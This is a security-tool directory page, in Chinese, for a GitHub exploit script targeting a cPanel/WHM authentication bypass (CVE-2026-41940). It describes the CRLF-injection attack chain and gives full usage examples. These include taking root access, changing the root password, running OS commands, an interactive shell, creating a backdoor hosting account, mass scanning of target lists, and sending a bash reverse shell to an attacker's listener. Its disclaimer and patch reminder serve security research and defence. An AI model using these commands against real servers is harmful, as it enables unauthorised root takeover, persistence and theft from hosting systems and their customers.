Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41940 — cPanel/WHM 身份验证绕过(零日漏洞) | Kitploit
工具/GitHubGitHub/christian93111/cve-2026-41940
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制身份验证学习与教育红队Payload 开发
GitHubchristian93111/cve-2026-41940

CVE-2026-41940

cPanel/WHM 身份验证绕过(零日漏洞)

查看仓库
10243个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-41940:cPanel/WHM 认证绕过(单目标与多目标)

免责声明: 本文档及关联脚本 (exploit.py) 仅供教育目的、安全研究和授权的渗透测试使用。请勿将此软件用于您不拥有或未经明确许可测试的系统。

概述

exploit.py 是一个演示 cPanel & WHM 中认证绕过漏洞(CVE-2026-41940)的脚本。该漏洞允许未经认证的攻击者通过 CRLF 注入漏洞将 root 会话注入守护进程缓存,最终无需有效凭据即可获得 root 级别的 WHM 访问权限。

漏洞分析与利用流程

该漏洞利用基本认证处理机制中的 CRLF(回车换行)注入漏洞,结合会话传播缺陷。脚本自动化了四个阶段的攻击:

  1. 预认证会话铸造: 连接到公开登录端点(例如 /login/ 或 /cgi/login.cgi)获取基线未认证会话 Cookie (whostmgrsession)。
  2. CRLF 注入: 发送精心构造的包含 Base64 编码有效载荷的基本认证头部,直接将 root 会话字段注入 cpsrvd 会话缓存。服务器的重定向响应泄露了生成的安全令牌 (cpsess)。
  • 会话传播: 将原始会话 Cookie 发送到经过认证的 WHM 端点,触发 do_token_denied 将伪造的会话传播到守护进程缓存——使其成为有效的经过认证的会话。
  • 验证: 使用伪造的会话访问受限的 WHM API 端点(例如 /json-api/version)以确认 root 级别访问权限。

  • 先决条件

    • Python 3.x
    • requests 库
    root@kitploit:~
    pip install requests
    

    用法

    root@kitploit:~
    python exploit.py --target <URL> [options]
    python exploit.py --target-file <FILE> [options]
    

    参数

    目标选择

    参数描述
    --target URL单个 WHM URL(例如 https://target:2087)
    --target-file FILE包含目标的文件(每行一个 ip:port)——自动启用检查模式

    网络与核心选项

    参数描述
    --threads N多目标模式下的并发线程数(默认:10)
    --hostname HOST覆盖 Host 头部——当自动发现失败或给出错误主机名时使用
    --timeout N每个请求的超时时间(秒)(默认:15)
    --retries N网络错误重试次数(默认:3)
    --cookie-name NAME强制指定会话 Cookie 名称(如果省略则自动检测)
    --no-verify跳过阶段 4 验证并继续执行

    利用选项(绕过后)

    参数描述
    --check仅检查模式——验证漏洞而不进行利用(使用 --target-file 时自动设置)
    --password PASS将 root 密码更改为 PASS
    --api FUNC调用特定的 WHM JSON-API 函数
    --api-params K=V,...--api 的逗号分隔参数
    --exec CMD通过 WHM scripts/run_script 执行操作系统命令(备用:rawexec)
    --session生成一个 root 一键登录 URL——立即打开,令牌过期很快
    --shell进入交互式 WHM shell(仅限单目标)
    --dump转储服务器信息:版本、账户、DNS 区域、权限
    --add-user USER PASS DOMAIN创建一个新的 cPanel 托管账户
    --revshell LHOST LPORT向您的监听器发送一个 bash 反向 shell

    输出选项

    参数描述
    --output FILE将会话令牌和详细信息保存到 JSON 文件

    示例

    root@kitploit:~
    # 检查目标是否易受攻击
    python exploit.py --target https://target:2087 --check
    
    # 转储服务器信息(版本、账户、权限)
    python exploit.py --target https://target:2087 --dump
    
    # 生成一个一键 root 登录 URL(立即粘贴到浏览器)
    python exploit.py --target https://target:2087 --session
    
    # 执行命令
    python exploit.py --target https://target:2087 --exec "id"
    
    # 进入交互式 WHM shell
    python exploit.py --target https://target:2087 --shell
    
    # 更改 root 密码
    python exploit.py --target https://target:2087 --password 'NewP@ss!'
    
    # 直接调用 WHM API
    python exploit.py --target https://target:2087 --api version
    python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1
    
    # 创建一个后门 cPanel 账户
    python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com
    
    # 发送反向 shell
    python exploit.py --target https://target:2087 --revshell YOUR_IP 4444
    
    # 覆盖主机名(当自动发现失败时使用)
    python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check
    
    # 扫描多个目标(仅检查模式)
    python exploit.py --target-file ips.txt
    python exploit.py --target-file ips.txt --threads 20
    
    # 将会话保存到文件
    python exploit.py --target https://target:2087 --dump --output results.json
    

    交互式 Shell 命令

    使用 --shell 时,可使用以下命令:

    命令描述
    api <function> [k=v ...]调用 WHM JSON-API 函数(例如 api version)
    exec <command>通过 WHM 运行操作系统命令(例如 exec id)
    passwd <newpass>更改 root 密码
    dump转储服务器信息
    revshell <lhost> <lport>发送反向 shell
    add <user> <pass> <domain>创建一个 cPanel 账户
    save <path>将当前会话保存到文件
    exit / quit退出 shell

    提醒

    请立即更新最新的 cPanel/WHM 安全补丁。

    下载工具